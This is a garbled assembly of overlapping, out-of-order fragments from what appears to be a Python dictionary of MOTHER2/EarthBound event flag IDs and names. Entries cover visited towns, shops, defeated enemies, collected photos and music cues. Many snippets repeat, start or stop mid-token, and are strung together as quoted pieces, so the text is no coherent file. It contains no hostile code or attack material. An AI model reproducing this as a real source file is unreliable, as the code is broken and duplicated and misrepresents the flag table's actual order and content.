31: 'LIER_INSIDE_HOUSE', 32: 'LIER_INSIDE_CAVE_1',", "194: 'CONQUERED_SANCTUARY_5', 195: 'CONQUERED_SANCTUARY_6', 196: 'CONQUERED_SANCTUARY_7', 197: 'CONQUERED_SANCTUARY_8', # 198 (Unknown. Set when", "'GOT_SATURN_RIBBON', 645: 'ESCARGO_EXPRESS_PICK_UP', 646: 'FOR_SALE_SIGN_CUSTOMER_2', 647: 'FOR_SALE_SIGN_CUSTOMER_3', 648: 'FOR_SALE_SIGN_CUSTOMER_4', 649: 'TALKED_TO_ROCK_BELOW_TENDA_VILALGE', 650: 'GOT_MONKEYS_LOVE',", "'CHAOS_THEATER_AUDIENCE_ABSENT', 752: 'HINT_GUY_ABSENT', 753: 'NESS_HOUSE_PHONE_RINGING', 754: 'PREVENT_TELEPORT', 755: 'GOT_INSIGNIFICANT_ITEM', 756: 'DUNGEON_MAN_IN_PARTY', 757: 'GEORGE_HAS_DIAMOND',", "389: 'MOONSIDE_HOSPITAL_ABSTRACT_ART_DEFEATED', 390: 'GUARDIAN_HIEROGLYPH_1_DEFEATED', # The first Hieroglyph Guardian doesn't reference this flag", "292: 'ONETT_COP_4_DEFEATED', 293: 'ONETT_COP_5_DEFEATED', 294: 'APPLE_MOUSE_BLOCKING_DOOR', 295: 'NESS_HOUSE_DOOR_KNOCKING', 296: 'ZOMBIE_CHICK_AT_HOTEL_1', # First hotel", "353: 'HH_HQ_CULTIST_3_DEFEATED', 354: 'HH_HQ_CULTIST_4_DEFEATED', 355: 'HH_HQ_CULTIST_5_DEFEATED', 356: 'HH_HQ_CULTIST_6_DEFEATED', 357: 'SENTRY_ROBOT_1_DEFEATED', 358: 'SENTRY_ROBOT_2_DEFEATED', 359:", "'MONKEY_CAVE_PIZZA_2', 457: 'MONKEY_CAVE_HAMBURGER_1', 458: 'MONKEY_CAVE_HAMBURGER_2', 459: 'MONKEY_CAVE_KING_BANANA', 460: 'MONKEY_CAVE_HAMBURGER_3', 461: 'MONKEY_CAVE_FRESH_EGG', 462: 'MONKEY_CAVE_RULER',", "'RUNAWAY_BUS_OR_SKY_RUNNER_FALLING_MUSIC', 536: 'RUNAWAY_FIVE_FREE_MUSIC', 537: 'TESSIE_MUSIC', # 538 (???) 539: 'GIVEN_PLAYERS_NAME', # 540 (???)", "'RANDOM_JEFF_ITEM_FIX_CHANCE', 697: 'SHARK_AT_ARCADE_UPSTAIRS_DEFEATED', 698: 'GOT_PHOTO_NESS_HOUSE', 699: 'GOT_PHOTO_SCAM_HOUSE', 700: 'GOT_PHOTO_CYCLE_SHOP', 701: 'GOT_PHOTO_PEACEFUL_REST_VALLEY', 702: 'GOT_PHOTO_HAPPY_HAPPY_CABIN',", "Tess. This is only set if you're near (0x02A0, 0x0D70) in a radius", "'GOT_SATURN_COIN', 173: 'GOT_SATURN_STAG_BEETLE', 174: 'DESERT_MINE_EXPANDED', # 175 (Unknown. Set when you receive the", "'BLUE_COW_ALT_TEXT', 124: 'ZOMBIE_PAPER_ON_TENT', 125: 'ZOMBIES_ON_TENT_FLOOR', 126: 'LEARNED_ABOUT_SHYNESS_BOOK', # TODO: Maybe \"can search for", "'HIDE_ONETT_BAKERY_TOWN_MAP', 563: 'HIDE_ONETT_TO_TWOSON_TOWN_MAP', 564: 'HIDE_TWOSON_HOTEL_TOWN_MAP', 565: 'HIDE_TWOSON_DEPT_STORE_TOWN_MAP', 566: 'HIDE_TWOSON_TO_ONETT_TOWN_MAP', 567: 'HIDE_TWOSON_BUS_STOP_TOWN_MAP', 568: 'HIDE_TWOSON_HOSPITAL_TOWN_MAP',", "'VISITED_FOURSIDE', 215: 'VISITED_SUMMERS', 216: 'VISITED_DALAAM', 217: 'VISITED_SCARABA', 218: 'VISITED_DEEP_DARKNESS', 219: 'VISITED_TENDA_VILLAGE', 220: 'VISITED_UNDERWORLD',", "325: 'SHOP_SCARABA_BAZAAR_EQUIPMENT', 326: 'SHOP_SCARABA_HOTEL_ARMS_DEALER', 327: 'PHASE_DISTORTER_V3_AT_CAVE_OF_THE_PRESENT', 328: 'ANDONUTS_AT_CAVE_OF_THE_PRESENT_1', 329: 'APPLE_KID_AT_CAVE_OF_THE_PRESENT', 330: 'MR_SATURN_AT_CAVE_OF_THE_PRESENT', 331:", "437: 'SEA_OF_EDEN_KRAKEN_2_DEFEATED', 438: 'SEA_OF_EDEN_KRAKEN_3_DEFEATED', 439: 'GOT_MAGIC_TRUFFLE_1', 440: 'GOT_MAGIC_TRUFFLE_2', 441: 'GOT_MAGIC_TRUFFLE_3', 442: 'GOT_MAGIC_TRUFFLE_4', 443:", "450: 'CAPTAIN_STRONG_NOT_AT_STATION_DESK', 451: 'MONKEY_CAVE_SKIP_SANDWICH', 452: 'MONKEY_CAVE_PICNIC_LUNCH', 453: 'MONKEY_CAVE_WET_TOWEL', 454: 'MONKEY_CAVE_PIZZA_1', 455: 'MONKEY_CAVE_PROTEIN_DRINK', 456:", "# Flag names for MOTHER2/Earthbound # Luckily, every version uses the same flag", "208: 'FLYING_MAN_5_DEAD', 209: 'VISITED_ONETT', 210: 'VISITED_TWOSON', 211: 'VISITED_THREED', 212: 'VISITED_WINTERS', 213: 'VISITED_SATURN_VALLEY', 214:", "'UNUSED_BRAIN_FOOD_LUNCH', 222: 'UNUSED_REFRESHING_HERB', 223: 'GOT_PHASE_DISTORTER_HORN_OF_LIFE', 224: 'SHOP_SOLD_OLD_EQUIPMENT', 225: 'SHOP_SOLD_ITEM', # 226 (I hate", "'CONQUERED_SANCTUARY_5', 195: 'CONQUERED_SANCTUARY_6', 196: 'CONQUERED_SANCTUARY_7', 197: 'CONQUERED_SANCTUARY_8', # 198 (Unknown. Set when Paula", "(Related to Bulldozer at Fourside Bridge?) 145: 'TALKED_TO_DYING_EVERDRED', 146: 'RUNAWAY_FIVE_FREE_FROM_TOPOLLA_THEATER', # 147 (Venus", "'PHOTO_BRICK_ROAD_DUNGEON_AVAILABLE', 487: 'PHOTO_THREED_CEMETERY_AVAILABLE', 488: 'PHOTO_GRAPEFRUIT_FALLS_AVAILABLE', 489: 'PHOTO_SATURN_VALLEY_COFFEE_AVAILABLE', 490: 'PHOTO_CIRCUS_TENT_AVAILABLE', 491: 'PHOTO_BLACK_SESAME_SEED_AVAILABLE', 492: 'PHOTO_DESERT_MINE_AVAILABLE',", "386: 'MOONSIDE_ENRAGED_FIRE_PLUG_DEFEATED', # Unused, there's no NPC attached to the script for this", "575: 'HIDE_FOURSIDE_HOSPITAL_TOWN_MAP', 576: 'HIDE_FOURSIDE_DEPT_STORE_TOWN_MAP', 577: 'HIDE_FOURSIDE_BAKERY_TOWN_MAP', 578: 'HIDE_FOURSIDE_HOTEL_TOWN_MAP', 579: 'HIDE_SCARABA_HOTEL_TOWN_MAP', 580: 'HIDE_SCARABA_HOSPITAL_TOWN_MAP', 581:", "'LETHAL_ASP_HIEROGLYPH_4_DEFEATED', 411: 'LETHAL_ASP_HIEROGLYPH_5_DEFEATED', 412: 'LETHAL_ASP_HIEROGLYPH_6_DEFEATED', 413: 'LETHAL_ASP_HIEROGLYPH_7_DEFEATED', 414: 'LETHAL_ASP_HIEROGLYPH_8_DEFEATED', 415: 'LETHAL_ASP_HIEROGLYPH_9_DEFEATED', 416: 'BRICK_ROAD_DUNGEON_DUCK_1_DEFEATED',", "533: 'NESS_ROOM_METEORITE_CRASH_MUSIC', 534: 'CITY_BUS_MUSIC', 535: 'RUNAWAY_BUS_OR_SKY_RUNNER_FALLING_MUSIC', 536: 'RUNAWAY_FIVE_FREE_MUSIC', 537: 'TESSIE_MUSIC', # 538 (???)", "733: 'SHOP_MOONSIDE', 734: 'ONETT_HOSPITAL_PATIENT_OWNER_JOKE', 735: 'TALKED_TO_SMASH_WOUND_GIRLS_MOTHER', 736: 'GOT_PAIR_OF_DIRTY_SOCKS', 737: 'TALKED_TO_TWOSON_HOTEL_GUY_AT_TABLE_NINE_TIMES', 738: 'GOT_MONEY_FROM_TWOSON_HOTEL_GUY_AT_TABLE', 739:", "(???) 306: 'LIER_INSIDE_CAVE_3', 307: 'LIER_INSIDE_CAVE_4', 308: 'LIER_BY_MANI_MANI', 309: 'RUNAWAY_BUS_FROM_TWOSON_TO_THREED', 310: 'POKEY_WAITING_AT_COUCH', 311: 'WINTERS_ROPE_LOWERED',", "106 (???) 107: 'ONETT_SUNRISE', 108: 'ENTERTAINERS_SHACK_UNLOCKED', 109: 'ONETT_COP_DIALOGUE', # 110 (???) 111: 'VISITED_PEACEFUL_REST_PENCIL',", "'ONETT_COP_5_DEFEATED', 294: 'APPLE_MOUSE_BLOCKING_DOOR', 295: 'NESS_HOUSE_DOOR_KNOCKING', 296: 'ZOMBIE_CHICK_AT_HOTEL_1', # First hotel room 297: 'ZOMBIE_CHICK_AT_HOTEL_2',", "about Lake Tess color palette) 288: 'USED_HAWK_EYE', 289: 'ONETT_COP_1_DEFEATED', 290: 'ONETT_COP_2_DEFEATED', 291: 'ONETT_COP_3_DEFEATED',", "357: 'SENTRY_ROBOT_1_DEFEATED', 358: 'SENTRY_ROBOT_2_DEFEATED', 359: 'SENTRY_ROBOT_3_DEFEATED', 360: 'SENTRY_ROBOT_4_DEFEATED', 361: 'SENTRY_ROBOT_5_DEFEATED', 362: 'SENTRY_ROBOT_6_DEFEATED', 363:", "772: 'LAST_DAD_CALL', 773: 'NERDY_GUY_AND_FAT_GUY_AT_CIRCUS_TENT', # Visibility flags for NPCs #457 and #459 774:", "214: 'VISITED_FOURSIDE', 215: 'VISITED_SUMMERS', 216: 'VISITED_DALAAM', 217: 'VISITED_SCARABA', 218: 'VISITED_DEEP_DARKNESS', 219: 'VISITED_TENDA_VILLAGE', 220:", "'NESS_NIGHTMARE_DEFEATED', 75: 'MANI_MANI_DEFEATED', 76: 'GOT_TRACY_COOKIE', 77: 'GOT_MR_BASEBALL_CAP', 78: 'GOT_ENTERTAINERS_TRAVEL_CHARM', 79: 'GOT_METEORITE_PIECE', 80: 'GOT_KEY_TO_SHACK',", "'LETHAL_ASP_HIEROGLYPH_2_DEFEATED', 409: 'LETHAL_ASP_HIEROGLYPH_3_DEFEATED', 410: 'LETHAL_ASP_HIEROGLYPH_4_DEFEATED', 411: 'LETHAL_ASP_HIEROGLYPH_5_DEFEATED', 412: 'LETHAL_ASP_HIEROGLYPH_6_DEFEATED', 413: 'LETHAL_ASP_HIEROGLYPH_7_DEFEATED', 414: 'LETHAL_ASP_HIEROGLYPH_8_DEFEATED',", "383: 'JUST_RESTED', 384: 'GOT_ALL_MELODIES', 385: 'GOT_CONTACT_LENS', 386: 'MOONSIDE_ENRAGED_FIRE_PLUG_DEFEATED', # Unused, there's no NPC", "'GOT_PENCIL_ERASER', 84: 'GOT_HAND_AID', 85: 'GOT_WAD_OF_BILLS', 86: 'GOT_FRANKLIN_BADGE', 87: 'GOT_FLY_HONEY', 88: 'GOT_BAD_KEY_MACHINE', 89: 'GOT_SHYNESS_BOOK',", "'MONKEY_CAVE_KING_BANANA', 460: 'MONKEY_CAVE_HAMBURGER_3', 461: 'MONKEY_CAVE_FRESH_EGG', 462: 'MONKEY_CAVE_RULER', 463: 'TALKED_TO_FRESH_EGG_GIVING_MONKEY', 464: 'GOT_KING_BANANA', # 465", "Kid 127: 'TALKED_TO_ANDONUTS_1', 128: 'JEFF_STARTS_HIS_JOURNEY', 129: 'TESSIE_EMERGES', 130: 'TALKED_TO_ANDONUTS_2', 131: 'WATERFALL_WAIT_ENABLED', 132: 'QUEST_TO_ZEXONYTE',", "31: 'LIER_INSIDE_HOUSE', 32: 'LIER_INSIDE_CAVE_1', 33: 'LIER_INSIDE_CAVE_2', 34: 'PICKY_AT_HIS_ROOM', 35: 'POKEY_AT_HIS_ROOM', 36: 'COP_AT_ENTERTAINERS_SHACK', 37:", "519: 'GUARDIAN_MOLE_TEXT_2', 520: 'GUARDIAN_MOLE_TEXT_3', 521: 'GUARDIAN_MOLE_TEXT_4', # 522 (Multipurpose?) # 523 (Multipurpose?) 524:", "# 283 (???) 284: 'PEACEFUL_REST_PENCIL_ERASED', 285: 'TALKED_TO_APPLE_KID_CAVE_OF_THE_PRESENT', # 286 (???) # 287 (Something", "show about to start?) # 680 (Something about Venus show about to start?)", "302 (???) 303: 'BUZZ_BUZZ_DYING_ON_FLOOR', 304: 'KING_AWAKE_AT_HOME', # 305 (???) 306: 'LIER_INSIDE_CAVE_3', 307: 'LIER_INSIDE_CAVE_4',", "'HIDE_ONETT_HOTEL_TOWN_MAP', 561: 'HIDE_ONETT_HOSPITAL_TOWN_MAP', 562: 'HIDE_ONETT_BAKERY_TOWN_MAP', 563: 'HIDE_ONETT_TO_TWOSON_TOWN_MAP', 564: 'HIDE_TWOSON_HOTEL_TOWN_MAP', 565: 'HIDE_TWOSON_DEPT_STORE_TOWN_MAP', 566: 'HIDE_TWOSON_TO_ONETT_TOWN_MAP',", "the Gourmet Yogurt Machine) # 377 (???) # 378 (???) 379: 'ANDONUTS_AT_LAB_ABSENT', #", "260: 'SHOP_FOURSIDE_DEPT_4TH_FLOOR_SPORTS', 261: 'SHOP_FOURSIDE_DEPT_BURGER', 262: 'SHOP_FOURSIDE_DEPT_CONDIMENTS', 263: 'SHOP_FOURSIDE_DEPT_ARMS_DEALER', 264: 'SHOP_FOURSIDE_PUNK_GUY', 265: 'SHOP_SUMMERS_SHOP', 266:", "hotel room 298: 'ZOMBIE_CHICK_AT_HOTEL_3', # Third hotel room 299: 'IRON_ERASER_ERASED', 300: 'ZOMBIE_GUARDS_AWAY', 301:", "10: 'TEMP_10', 11: 'ENEMY_SUPPRESS', 12: 'PAULAS_PARENTS_KNOW_ABOUT_HH_RESCUE', 13: 'PAULA_JOINS', 14: 'JEFF_JOINS', 15: 'MONSTERS_IN_WINTERS', 16:", "'GUARDIAN_HIEROGLYPH_5_DEFEATED', 395: 'GUARDIAN_HIEROGLYPH_6_DEFEATED', 396: 'GUARDIAN_HIEROGLYPH_7_DEFEATED', 397: 'GUARDIAN_HIEROGLYPH_8_DEFEATED', 398: 'GUARDIAN_HIEROGLYPH_9_DEFEATED', 399: 'GUARDIAN_HIEROGLYPH_10_DEFEATED', 400: 'GUARDIAN_HIEROGLYPH_11_DEFEATED',", "'NESS_WEARING_PAJAMAS', 750: 'LEFT_HOME_AT_LEAST_ONCE', 751: 'CHAOS_THEATER_AUDIENCE_ABSENT', 752: 'HINT_GUY_ABSENT', 753: 'NESS_HOUSE_PHONE_RINGING', 754: 'PREVENT_TELEPORT', 755: 'GOT_INSIGNIFICANT_ITEM',", "336: 'GOT_KEY_TO_DUNGEON_MAN', 337: 'CALLED_STOIC_CLUB', 338: 'NEAR_WINTERS_ROPE', 339: 'APPLE_KID_NOT_AT_HIS_HOUSE', # 340 (???) 341: 'RECEIVED_APPLE_KID_CALL_ABOUT_PENCIL_ERASER',", "'GOT_PHOTO_FOURSIDE_DEPT_STORE', 717: 'GOT_PHOTO_POOS_PALACE_INSIDE', 718: 'GOT_PHOTO_POOS_PALACE_OUTSIDE', 719: 'GOT_PHOTO_STONEHENGE', 720: 'GOT_PHOTO_SUMMERS_HOTEL', 721: 'GOT_PHOTO_FOURSIDE_RESTAURANT', 722: 'GOT_PHOTO_SUMMERS_BEACH',", "# 340 (???) 341: 'RECEIVED_APPLE_KID_CALL_ABOUT_PENCIL_ERASER', 342: 'PYRAMID_OPEN', 343: 'GOT_HIEROGLYPH_COPY', 344: 'LAKE_TESS_WIND_BLOWING', # 345", "'SHOP_RED_SNAKE', 325: 'SHOP_SCARABA_BAZAAR_EQUIPMENT', 326: 'SHOP_SCARABA_HOTEL_ARMS_DEALER', 327: 'PHASE_DISTORTER_V3_AT_CAVE_OF_THE_PRESENT', 328: 'ANDONUTS_AT_CAVE_OF_THE_PRESENT_1', 329: 'APPLE_KID_AT_CAVE_OF_THE_PRESENT', 330: 'MR_SATURN_AT_CAVE_OF_THE_PRESENT',", "'ANDONUTS_AT_CAVE_OF_THE_PRESENT_1', 329: 'APPLE_KID_AT_CAVE_OF_THE_PRESENT', 330: 'MR_SATURN_AT_CAVE_OF_THE_PRESENT', 331: 'ANDONUTS_AT_CAVE_OF_THE_PRESENT_2', 332: 'PHASE_DISTORTER_V2_AT_CAVE_OF_THE_PRESENT', 333: 'DESERT_MINE_BULLDOZER_MOVED', 334: 'BUBBLE_MONKEY_JOINS',", "45: 'POKEY_OUTSIDE_PAULA_CABIN', 46: 'ZOMBIE_CHICK_OUTSIDE_HOTEL', 47: 'BROKEN_SKYRUNNER_THREED', 48: 'FIXED_SKYRUNNER_THREED', 49: 'BOOGEY_TENT_IN_THREED', 50: 'BRICK_ROAD_OUTSIDE_DUNGEON', 51:", "to Lake Tess. This is only set if you're near (0x02A0, 0x0D70) in", "'SHOP_UNDERWORLD_TENDA', 732: 'SHOP_MAGICANT', 733: 'SHOP_MOONSIDE', 734: 'ONETT_HOSPITAL_PATIENT_OWNER_JOKE', 735: 'TALKED_TO_SMASH_WOUND_GIRLS_MOTHER', 736: 'GOT_PAIR_OF_DIRTY_SOCKS', 737: 'TALKED_TO_TWOSON_HOTEL_GUY_AT_TABLE_NINE_TIMES',", "(???) # 158 (???) 159: 'CHECKED_LAST_FLYING_MAN_TOMBSTONE', # 160 (???) # 161 (???) #", "'SHOP_SCARABA_BAZAAR_FOOD', 598: 'SHOP_SCARABA_WATER', 599: 'SHOP_SOUTH_SCARABA_VARIETY', 600: 'SHOP_DEEP_DARKNESS_BUSINESSMAN', 601: 'SHATTERED_MAN_1_DEFEATED', 602: 'SHATTERED_MAN_2_DEFEATED', 603: 'MINI_BARF_DEFEATED',", "'KING_JOINS', 445: 'TALKED_TO_BRICK_ROADS_HEAD', 446: 'FOR_SALE_SIGN_CUSTOMER_1', # 447 (???) # 448 (???) 449: 'CAPTAIN_STRONG_AT_STATION_ENTRANCE',", "307: 'LIER_INSIDE_CAVE_4', 308: 'LIER_BY_MANI_MANI', 309: 'RUNAWAY_BUS_FROM_TWOSON_TO_THREED', 310: 'POKEY_WAITING_AT_COUCH', 311: 'WINTERS_ROPE_LOWERED', 312: 'GHOSTS_BLOCKING_THREED', #", "46: 'ZOMBIE_CHICK_OUTSIDE_HOTEL', 47: 'BROKEN_SKYRUNNER_THREED', 48: 'FIXED_SKYRUNNER_THREED', 49: 'BOOGEY_TENT_IN_THREED', 50: 'BRICK_ROAD_OUTSIDE_DUNGEON', 51: 'SHYNESS_BOOK_AT_LIBRARY', 52:", "'BOUGHT_OR_SOLD_AT_SHOP', 658: 'BOUGHT_WEAPON', 659: 'MOONSIDE_SWITCH_YES_NO', 660: 'ALT_NO_TALK_TEXT', 661: 'CHOSEN_FOUR_SOULS_RETURNING_MUSIC', 662: 'DUNGEON_MAN_DESERT_MUSIC', 663: 'RETURNED_SHYNESS_BOOK',", "251: 'SHOP_DESERT_DRUGSTORE_EQUIPMENT', 252: 'SHOP_DESERT_DRUGSTORE_CONSUMABLES', 253: 'SHOP_DESERT_MINE', 254: 'SHOP_DESERT_ARMS_DEALER', 255: 'SHOP_FOURSIDE_BAKERY', 256: 'SHOP_FOURSIDE_DEPT_3RD_FLOOR_EQUIPMENT', 257:", "the same flag IDs FLAG_NAMES = { 1: 'TEMP_1', 2: 'TEMP_2', 3: 'TEMP_3',", "(Related to Poo's journey) 151: 'QUEST_TO_SUBMARINE', 152: 'PYRAMID_DANCE_IN_PROGRESS', 153: 'TENDA_VILLAGE_UNDERGROUND_OPEN', 154: 'TALKED_TO_TENDA_CHIEF', 155:", "'TENDA_SHOP_SPICY_JERKY', 428: 'TENDA_SHOP_BAG_OF_DRAGONITE', 429: 'TENDA_SHOP_TALISMAN_COIN', 430: 'TENDA_SHOP_HALL_OF_FAME_BAT', # 431 (???) 432: 'DEBUG_SKIP_SANDWICH_DX', 433:", "uses the same flag IDs FLAG_NAMES = { 1: 'TEMP_1', 2: 'TEMP_2', 3:", "117: 'INVESTED_IN_ORANGE_KID', 118: 'PAULAS_DAD_OUTSIDE', 119: 'RUNAWAY_FIVE_FREE_FROM_CHAOS_THEATER', 120: 'SHOPPED_AT_FOOD_STAND', 121: 'DID_NOT_PAY_FOOD_STAND', 122: 'CARPAINTER_HAS_KEY', 123:", "261: 'SHOP_FOURSIDE_DEPT_BURGER', 262: 'SHOP_FOURSIDE_DEPT_CONDIMENTS', 263: 'SHOP_FOURSIDE_DEPT_ARMS_DEALER', 264: 'SHOP_FOURSIDE_PUNK_GUY', 265: 'SHOP_SUMMERS_SHOP', 266: 'SHOP_SUMMERS_RESTAURANT', 267:", "285: 'TALKED_TO_APPLE_KID_CAVE_OF_THE_PRESENT', # 286 (???) # 287 (Something about Lake Tess color palette)", "# Visibility flags for NPCs #457 and #459 774: 'TALKED_TO_MOONSIDE_SAILOR_MAN', # 775 (Can't", "600: 'SHOP_DEEP_DARKNESS_BUSINESSMAN', 601: 'SHATTERED_MAN_1_DEFEATED', 602: 'SHATTERED_MAN_2_DEFEATED', 603: 'MINI_BARF_DEFEATED', 604: 'GOT_KEY_TO_THE_LOCKER', 605: 'USED_KEY_TO_THE_LOCKER', 606:", "# Luckily, every version uses the same flag IDs FLAG_NAMES = { 1:", "'GOT_PHOTO_THREED_CEMETERY', 707: 'GOT_PHOTO_GRAPEFRUIT_FALLS', 708: 'GOT_PHOTO_SATURN_VALLEY_COFFEE', 709: 'GOT_PHOTO_CIRCUS_TENT', 710: 'GOT_PHOTO_BLACK_SESAME_SEED', 711: 'GOT_PHOTO_DESERT_MINE', 712: 'GOT_PHOTO_FOURSIDE_BRIDGE',", "is set even if you don't talk to Apple Kid 127: 'TALKED_TO_ANDONUTS_1', 128:", "15: 'MONSTERS_IN_WINTERS', 16: 'POO_JOINS', 17: 'POO_LEARNING_STARSTORM', 18: 'BUZZ_BUZZ_IN_PARTY', 19: 'SLEEPING_KING_ABSENT', 20: 'PICKY_IN_PARTY', 21:", "(???) 66: 'EVERDRED_DEFEATED', 67: 'FOOD_STAND_MONITOR_DEFEATED', 68: 'CARPAINTER_DEFEATED', 69: 'BOOGEY_TENT_DEFEATED', 70: 'STARMAN_DX_DEFEATED', 71: 'MASTER_BELCH_DEFEATED',", "380 (???) # 381 (???) 382: 'KIDNAPPED_MR_SATURN_AT_CAVE_OF_THE_PRESENT', 383: 'JUST_RESTED', 384: 'GOT_ALL_MELODIES', 385: 'GOT_CONTACT_LENS',", "# 607 (Unknown. Related to desert mine?) 608: 'DESERT_MINE_TO_EXPAND_NEXT_NIGHT', 609: 'WINTERS_PENCIL_ERASED', 610: 'DETECTIVE_IN_THREED',", "829: 'PRESENT_TONY_COOKIE_1', 830: 'PRESENT_TONY_COOKIE_2', 831: 'PRESENT_TONY_COOKIE_3', 832: 'PRESENT_TONY_COOKIE_4', 833: 'PRESENT_TONY_COOKIE_5', 834: 'PRESENT_TONY_COOKIE_6', 835:", "90: 'GOT_DIAMOND', 91: 'GOT_SIGNED_BANANA', 92: 'GOT_TENDA_DRAGONITE', 93: 'GOT_MAGICANT_BASEBALL_CAP', 94: 'MOM_ADVICE_TO_TAKE_CRACKED_BAT', 95: 'DAD_CALLING_HOME', 96:", "'GOT_PHOTO_TOTO', 724: 'GOT_PHOTO_SCARABA_BAZAAR', 725: 'GOT_PHOTO_PYRAMID', 726: 'GOT_PHOTO_SCARABA_OASIS', 727: 'GOT_PHOTO_DEEP_DARKNESS', 728: 'GOT_PHOTO_TENDA_VILLAGE', 729: 'GOT_PHOTO_SATURN_VALLEY_FINAL',", "203: 'GOT_STOIC_CLUB_PHONE', 204: 'FLYING_MAN_1_DEAD', 205: 'FLYING_MAN_2_DEAD', 206: 'FLYING_MAN_3_DEAD', 207: 'FLYING_MAN_4_DEAD', 208: 'FLYING_MAN_5_DEAD', 209:", "663: 'RETURNED_SHYNESS_BOOK', 664: 'TREMBLING_MONOTOLI_AT_48TH_FLOOR_ABSENT', 665: 'GOT_LETTER_FROM_MOM', 666: 'GOT_LETTER_FROM_TONY', 667: 'GOT_LETTER_FROM_KIDS', 668: 'TALKED_TO_MONTAGUE_AT_SATURN_VALLEY_BEFORE_MAGICANT', 669:", "'SHOP_BURGLIN_PARK_BAKERY', 237: 'SHOP_BURGLIN_PARK_CONDIMENTS', 238: 'SHOP_BURGLIN_PARK_BANANA_LADY', 239: 'SHOP_HH_DRUGSTORE_CONSUMABLES', 240: 'SHOP_HH_DRUGSTORE_EQUIPMENT', 241: 'SHOP_THREED_DRUGSTORE_EQUIPMENT', 242: 'SHOP_THREED_DRUGSTORE_CONSUMABLES',", "263: 'SHOP_FOURSIDE_DEPT_ARMS_DEALER', 264: 'SHOP_FOURSIDE_PUNK_GUY', 265: 'SHOP_SUMMERS_SHOP', 266: 'SHOP_SUMMERS_RESTAURANT', 267: 'SHOP_TOTO_SHOP', 268: 'SHOP_SUMMERS_GELATO', 269:", "(???) # 162 (???) # 163 (???) # 164 (???) 165: 'INVISIBLE_MAN_JOINS', 166:", "Bus???) 748: 'SKY_RUNNER_AT_WINTERS_LAB', 749: 'NESS_WEARING_PAJAMAS', 750: 'LEFT_HOME_AT_LEAST_ONCE', 751: 'CHAOS_THEATER_AUDIENCE_ABSENT', 752: 'HINT_GUY_ABSENT', 753: 'NESS_HOUSE_PHONE_RINGING',", "753: 'NESS_HOUSE_PHONE_RINGING', 754: 'PREVENT_TELEPORT', 755: 'GOT_INSIGNIFICANT_ITEM', 756: 'DUNGEON_MAN_IN_PARTY', 757: 'GEORGE_HAS_DIAMOND', 758: 'GOING_TO_MAGICANT_MUSIC', 759:", "'GUARDIAN_GENERAL_DEFEATED', 436: 'SEA_OF_EDEN_KRAKEN_1_DEFEATED', 437: 'SEA_OF_EDEN_KRAKEN_2_DEFEATED', 438: 'SEA_OF_EDEN_KRAKEN_3_DEFEATED', 439: 'GOT_MAGIC_TRUFFLE_1', 440: 'GOT_MAGIC_TRUFFLE_2', 441: 'GOT_MAGIC_TRUFFLE_3',", "159: 'CHECKED_LAST_FLYING_MAN_TOMBSTONE', # 160 (???) # 161 (???) # 162 (???) # 163", "'HAS_BICYCLE', 82: 'GOT_RECEIVER_PHONE', 83: 'GOT_PENCIL_ERASER', 84: 'GOT_HAND_AID', 85: 'GOT_WAD_OF_BILLS', 86: 'GOT_FRANKLIN_BADGE', 87: 'GOT_FLY_HONEY',", "'UNUSED_REFRESHING_HERB', 223: 'GOT_PHASE_DISTORTER_HORN_OF_LIFE', 224: 'SHOP_SOLD_OLD_EQUIPMENT', 225: 'SHOP_SOLD_ITEM', # 226 (I hate multipurpose flags)", "'GOT_CONTACT_LENS', 386: 'MOONSIDE_ENRAGED_FIRE_PLUG_DEFEATED', # Unused, there's no NPC attached to the script for", "187: 'GOT_MELODY_PINK_CLOUD', 188: 'GOT_MELODY_LUMINE_HALL', 189: 'GOT_MELODY_FIRE_SPRING', 190: 'CONQUERED_SANCTUARY_1', 191: 'CONQUERED_SANCTUARY_2', 192: 'CONQUERED_SANCTUARY_4', 193:", "'EXIT_MOUSE_DISAGREEABLE', 767: 'LEARNED_ABOUT_UNDERWORLD_GEYSERS', 768: 'PAID_MUSEUM_ENTRANCE_FEE', # 769 (Checked when you talk to Tracy", "146: 'RUNAWAY_FIVE_FREE_FROM_TOPOLLA_THEATER', # 147 (Venus at Topolla?) 148: 'READ_HIEROGLYPHS', 149: 'POO_STARTS_HIS_JOURNEY', # 150", "238: 'SHOP_BURGLIN_PARK_BANANA_LADY', 239: 'SHOP_HH_DRUGSTORE_CONSUMABLES', 240: 'SHOP_HH_DRUGSTORE_EQUIPMENT', 241: 'SHOP_THREED_DRUGSTORE_EQUIPMENT', 242: 'SHOP_THREED_DRUGSTORE_CONSUMABLES', 243: 'SHOP_THREED_ARMS_DEALER', 244:", "'GOT_SHYNESS_BOOK', 90: 'GOT_DIAMOND', 91: 'GOT_SIGNED_BANANA', 92: 'GOT_TENDA_DRAGONITE', 93: 'GOT_MAGICANT_BASEBALL_CAP', 94: 'MOM_ADVICE_TO_TAKE_CRACKED_BAT', 95: 'DAD_CALLING_HOME',", "'DUNGEON_MAN_IN_PARTY', 757: 'GEORGE_HAS_DIAMOND', 758: 'GOING_TO_MAGICANT_MUSIC', 759: 'VENUS_AND_RUNAWAY_FANS_AT_TOPOLLA', # Visibility flag for NPCs #851", "start?) 681: 'SHOW_ONETT_HINT_TOWN_MAP', 682: 'SHOW_TWOSON_HINT_TOWN_MAP', 683: 'SHOW_THREED_HINT_TOWN_MAP', 684: 'SHOW_FOURSIDE_HINT_TOWN_MAP', 685: 'SHOW_SUMMERS_HINT_TOWN_MAP', 686: 'SHOW_SCARABA_HINT_TOWN_MAP',", "365: 'SHARK_AT_ARCADE_ABSENT', 366: 'SLIMY_LITTLE_PILE_1_DEFEATED_AND_THREED_BLOND_GUY_BY_TENT_ABSENT', 367: 'SLIMY_LITTLE_PILE_2_DEFEATED', 368: 'SLIMY_LITTLE_PILE_3_DEFEATED', 369: 'CAN_ENTER_BELCHS_FACTORY', # 370 (Unknown.", "'GOT_FRANKLIN_BADGE', 87: 'GOT_FLY_HONEY', 88: 'GOT_BAD_KEY_MACHINE', 89: 'GOT_SHYNESS_BOOK', 90: 'GOT_DIAMOND', 91: 'GOT_SIGNED_BANANA', 92: 'GOT_TENDA_DRAGONITE',", "'FLYING_MAN_5_DEAD', 209: 'VISITED_ONETT', 210: 'VISITED_TWOSON', 211: 'VISITED_THREED', 212: 'VISITED_WINTERS', 213: 'VISITED_SATURN_VALLEY', 214: 'VISITED_FOURSIDE',", "459: 'MONKEY_CAVE_KING_BANANA', 460: 'MONKEY_CAVE_HAMBURGER_3', 461: 'MONKEY_CAVE_FRESH_EGG', 462: 'MONKEY_CAVE_RULER', 463: 'TALKED_TO_FRESH_EGG_GIVING_MONKEY', 464: 